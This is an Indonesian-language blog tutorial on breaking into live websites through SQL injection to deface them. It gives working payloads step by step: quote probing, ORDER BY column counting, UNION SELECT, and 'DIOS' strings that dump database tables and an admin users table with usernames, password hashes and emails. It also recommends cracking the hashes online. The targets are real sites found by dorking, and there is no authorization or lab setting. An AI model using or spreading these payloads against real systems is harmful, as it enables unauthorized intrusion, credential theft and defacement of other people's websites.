Loading...

Cara Deface SQL Injection Manual With Dios


Assalamualaikum Wr Wb.
Yuhuu Comeback Lagi Bersama Gua Asano, Yang Lama Menghilangkan Dan Kini Sudah Hadir Kembali :v

Nah Kali Ini Gua Akan Ngasih Tutorial, "Cara Deface SQL Injection Manual With Dios"
Bagi Yang Penasaran Langsung Simak Baik² :)

Bahan² Yang Diperlukan :
- Dork : Sentuh Aku Mas
- Internet , Pastinya Yekan
- Sabar Dan Tenang
- Live Target Buat Pembelajaran (Sentuh Aku Mas)

1. Dorking Dulu Pake Dork Yang Sudah Gua Sediakan, Kalo Bisa Dorking Sendiri Biar Dapet Yang Fresh Anjay.

2. Disini Gua Udah Dapet Live Target Langsung Simak Baik² Ya.

Biasanya Web Yang Rawan SQLi Itu Dia Ada Tulis Urlnya, (id=Angka blablaabla) Contohnya Gua Mendapatkan id=42

3. Setelah Kalian Tambahan, Simbol ( ' ) Apa Angka Pokoknya ini Gak Tau lah Gua, Contoh  :
id=42'

Nah Jika Muncul Pesan Error Dan Atau Juga Blank (Gambarnya Putih Atau Backgroundnya Rusak) Seperti Gambar Di Atas, Kemungkinan Besar Web Tersebut Bisa Kita Ambil Database Nya :)

Contoh Beberapa Pesan Error Yang Gua Ketahui :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SQL query yang error' at line 1 
Warning: mysql_fetch_assoc()
Warning: mysql_fetch_array()
Warning: mysql_num_rows()
Warning: session_start()


4. Selanjutnya Kita Mulai Order Makanan, Canda Lur Fungsi Order Ini Kita Untuk Mencari Angka Yang Error, Supaya Bisa Keluar Nomor Togelnya :v
Contoh :
id=42'+order+by+1--+ ( Belum Error )

id=42'+order+by+2--+ ( Belum Error )
id=42'+order+by+3--+ ( Belum Error )
id=42'+order+by+4--+ ( Belum Error )
id=42'+order+by+5--+ ( Belum Error )
id=42'+order+by+6--+ ( Belum Error )
id=42'+order+by+7--+ ( Belum Error )

id=42'+order+by+8--+ (    E R R O R    )

5. Nah Selanjutnya Kita Mulai Union Select, Fungsi Union Select Ini Bertujuan Untuk, Menggabungkan Angka Yang Tidak Error. Contoh :

id=42'+union+select+1,2,3,4,5,6,7--+

Jangan Lupa Tambahkan ( - ) didepan id= contoh :

id=-42'+union+select+1,2,3,4,5,6,7--+
Dan Gua Mendapatkan Togelnya Angka 2, Nah Fungsi Angka Togel Ini, Untuk Digantikan Oleh Dios Biar Bisa Liat Database.

6. Dios ( Dump In One Shot )
Dios Untuk Melihat Table Yang Ada Di Database :

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Dios Untuk Melihat Isi Table Yang Ada Di Database :

make_set(6,@:=0x0a,(select(1)from(Isi Sesuai Yang Ada Di Database)where@:=make_set(511,@,0x3c6c693e,Isi Sesuai Yang Ada Di Database)),@)

Kalian Bisa Edit Dios "Melihat Isi Table Yang Ada Di Database" Sesuai Dengan Namanya.

7. Langsung Kita Masukin Diosnya Biar Bisa Liat Database Yang Ada Dalam Website Ini.
Contoh :

id=-42'+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7--+

Maka Akan Keluar Databasenya, Kalo Gak Keluar Kebangetan Lu :v
Langsung Saja Kita Cari Columb Admin Yekan.

Nah Columb Adminnya Yang Gua Lingkari Warna Merah Langsung Saja Siapin Diosnya Lur :v
Contoh :

id=-42'+union+select+1,make_set(6,@:=0x0a,(select(1)from(sadmin_users)where@:=make_set(511,@,0x3c6c693e,username,password,email)),@),3,4,5,6,7--+

Keluar Columb Adminnya Horeee :v

Untuk Hash Password Yang Berformat Seperti MD5 dan Seterusnya, Gua Saranin Pakai :
https://crackstation.net/

Oke Sekian Dari Gua Asano Mungkin Itu Saja Yang Bisa Saya Sampaikan Bila Ada Yang Salah Kata Maklumi Namanya Juga Manusia, Gua Asano Bye Bye :)

0 Response to "Cara Deface SQL Injection Manual With Dios"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Loading...